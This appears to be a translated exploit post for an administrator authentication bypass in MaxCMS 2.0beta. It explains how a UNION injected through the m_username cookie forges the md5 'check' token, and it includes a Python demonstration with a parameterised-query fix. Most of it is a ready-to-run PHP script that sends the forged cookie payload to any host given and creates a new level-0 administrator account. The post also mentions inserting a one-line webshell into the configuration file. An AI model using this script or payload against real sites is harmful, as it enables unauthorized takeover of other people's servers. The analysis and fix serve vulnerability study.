
MaxCMS 2.0beta (maxcms) administrator authentication bypass vulnerability


http://www.gipsky.com/
by flyh4t

http://bbs.wolvez.org/

The maxcms back end has an auto-update feature; the injection in the ajax handler was patched by it, but this vulnerability is still unpatched.

In the previous post someone asked whether the authentication can be bypassed. The answer is yes, with one prerequisite: you have to know the path of the admin directory.

Let's look at the vulnerable code again:



```vb
Sub checkPower
dim loginValidate,rsObj : loginValidate = "maxcms2.0"
err.clear
on error resume next
' m_username is read straight from the cookie and concatenated into the SQL string, unescaped
set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username='"&rCookie("m_username")&"'","execute")
' agent and IP are the requester's own values; rsObj(0) comes from the injectable query above
loginValidate = md5(getAgent&getIp&rsObj(0))
if err then wCookie "check"&rCookie("m_username"),"" : die ""
if rCookie("check"&rCookie("m_username"))<>loginValidate then wCookie "check"&rCookie("m_username"),"" : die ""
' rsObj(1) is m_level, also attacker-chosen once the query is injected
checkManagerLevel rsObj(1)
set rsObj=nothing
End Sub
```

where rCookie is simply:

```vb
Function rCookie(cookieName)
rCookie = request.cookies(cookieName)
End Function
```

The crux is the value of this variable: loginValidate = md5(getAgent&getIp&rsObj(0)). rCookie("m_username") is concatenated into the query without any escaping, so a UNION in the cookie lets the attacker decide what rsObj(0) (m_random) and rsObj(1) (m_level) contain. getAgent and getIp are also taken from the request (the exploit below pins User-Agent and X-Forwarded-For to fixed values, which suggests getIp honours X-Forwarded-For), so every input to the md5 is known to or chosen by the attacker and the expected "check" cookie can be computed offline.

Forging the cookie therefore bypasses this check outright. Once inside, one can add a new administrator or edit the configuration file to insert a one-line webshell.
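To make the failure concrete, here is an added example (not MaxCMS code, and not from the author of this post) that rebuilds the checkPower logic in Python over an in-memory SQLite table, runs the exploit's m_username payload through both the original string-concatenated query and a parameterised one, and computes the "check" cookie the way loginValidate does. Everything in it is an assumption for illustration: SQLite stands in for the site's real database, the table prefix is m_ (as the exploit's m_manager implies), m_level 0 is the administrator level, the sample m_random is made up, and getAgent/getIp are taken to be the User-Agent and X-Forwarded-For values the exploit sends.

```python
"""Added example: checkPower rebuilt in Python to show why the UNION in the
m_username cookie lets an attacker forge the check cookie, and how binding
the parameter stops it. All names and data here are constructed assumptions."""
import hashlib
import hmac
import sqlite3

AGENT = "flyh4t"   # User-Agent the exploit sends (assumed to be what getAgent returns)
IP = "1.1.1.1"     # X-Forwarded-For the exploit sends (assumed to be what getIp returns)


def make_db():
    """Constructed sample data: one real administrator with a secret m_random."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table m_manager (m_username text, m_random text, m_level integer)")
    conn.execute("insert into m_manager values ('admin', 'e4f1c2a9', 0)")
    return conn


def login_validate(agent, ip, m_random):
    """loginValidate = md5(getAgent & getIp & rsObj(0)), as in checkPower."""
    return hashlib.md5((agent + ip + m_random).encode()).hexdigest()


def check_power_vulnerable(conn, cookies, agent, ip):
    """Mirrors the original: the cookie value is concatenated into the SQL text.
    Returns the manager level on success, None where the original calls die."""
    username = cookies.get("m_username", "")
    sql = ("select m_random,m_level from m_manager where m_username='"
           + username + "'")
    row = conn.execute(sql).fetchone()
    if row is None:
        return None
    expected = login_validate(agent, ip, str(row[0]))   # VBScript's & stringifies rsObj(0)
    if cookies.get("check" + username) != expected:
        return None
    return row[1]                                        # handed to checkManagerLevel


def check_power_fixed(conn, cookies, agent, ip):
    """Same flow with a bound parameter (and a constant-time compare): the cookie
    can no longer alter the query, so rsObj(0) is always the stored m_random."""
    username = cookies.get("m_username", "")
    row = conn.execute(
        "select m_random,m_level from m_manager where m_username=?", (username,)
    ).fetchone()
    if row is None:
        return None
    expected = login_validate(agent, ip, str(row[0]))
    if not hmac.compare_digest(cookies.get("check" + username, ""), expected):
        return None
    return row[1]


def forged_cookies(agent, ip, fake_random="663179683474"):
    """Attacker side: the m_username value from the exploit's Cookie header.
    The UNION makes rsObj(0) = fake_random and rsObj(1) = 0, so the expected md5
    can be computed without ever knowing admin's real m_random."""
    payload = ("flyh4t' union select " + fake_random
               + ",0 from m_manager where m_username='admin")
    return {
        "m_username": payload,
        "m_level": "0",
        "check" + payload: login_validate(agent, ip, fake_random),
    }


def legitimate_cookies(conn, agent, ip):
    """What a real admin's browser holds after login (m_random read from the table)."""
    m_random = conn.execute(
        "select m_random from m_manager where m_username='admin'").fetchone()[0]
    return {"m_username": "admin", "checkadmin": login_validate(agent, ip, m_random)}


def demo():
    """Run forged and legitimate cookies through both checks."""
    conn = make_db()
    forged = forged_cookies(AGENT, IP)
    real = legitimate_cookies(conn, AGENT, IP)
    return {
        "vulnerable_forged": check_power_vulnerable(conn, forged, AGENT, IP),
        "fixed_forged": check_power_fixed(conn, forged, AGENT, IP),
        "vulnerable_real": check_power_vulnerable(conn, real, AGENT, IP),
        "fixed_real": check_power_fixed(conn, real, AGENT, IP),
    }


if __name__ == "__main__":
    for name, level in demo().items():
        print(name, "->", "denied" if level is None else "level %s" % level)
```

Binding the parameter is the fix for this bug: the forged cookie then selects no row and the request dies, while the real admin cookie still passes. Note what it does not fix: the token is still only md5 over two request-controlled values plus m_random, so its strength rests entirely on m_random staying secret, and binding it to agent and IP adds nothing when those headers are chosen by the requester.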

Here is an exploit that adds a new administrator:



```php
<?php
print_r('
---------------------------------------------------------------------------
maxcms2.0 create new admin exploit
by Flyh4t
team:wolvez security team
site:bbs.wolvez.org
dork:salemax#qq.com
---------------------------------------------------------------------------
');

if ($argc < 3) {
print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
---------------------------------------------------------------------------
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$name = rand(1,10000);
// Form fields for admin_manager.asp?action=add: new account flyh4t<rand>/wolvez at level 0
$cmd = 'm_username=flyh4t'.$name.'&m_pwd=wolvez&m_pwd2=wolvez&m_level=0';

$resp = send($cmd);
// The add handler answers with a javascript alert() when the account was created
if (stripos($resp, 'alert') === false) {echo "[~]bad luck, exploit failed"; exit;}

print_r('
---------------------------------------------------------------------------
[ ]cool, exploit success
[ ]you have added a new admin user flyh4t'.$name.'/wolvez
---------------------------------------------------------------------------
');

function send($cmd)
{
global $host, $path;
$message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: http://$host$path\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
// User-Agent and X-Forwarded-For are pinned because they feed getAgent/getIp;
// the check cookie below is presumably md5('flyh4t'.'1.1.1.1'.'663179683474'),
// computed for exactly these values
$message .= "User-Agent: flyh4t\r\n";
$message .= "X-Forwarded-For:1.1.1.1\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
// m_username carries the UNION that makes rsObj(0)=663179683474 and rsObj(1)=0;
// the check<m_username> cookie carries the matching md5
$message .= "Cookie: m_username=flyh4t' union select 663179683474,0 from m_manager where m_username='admin; m_level=0; checkflyh4t' union select 663179683474,0 from m_manager where m_username='admin=7728a57dcd5ae1e69cf0aee02ba66de6\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
echo $message;

$fp = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fp) {echo "[~]connect failed: $errstr ($errno)\n"; exit;}
fputs($fp, $message);

$resp = '';
while (!feof($fp))
$resp .= fread($fp, 1024);
fclose($fp);
echo $resp;
return $resp;
}
?>
```

Copyright © 2001-2010 安信网络. All Rights Reserved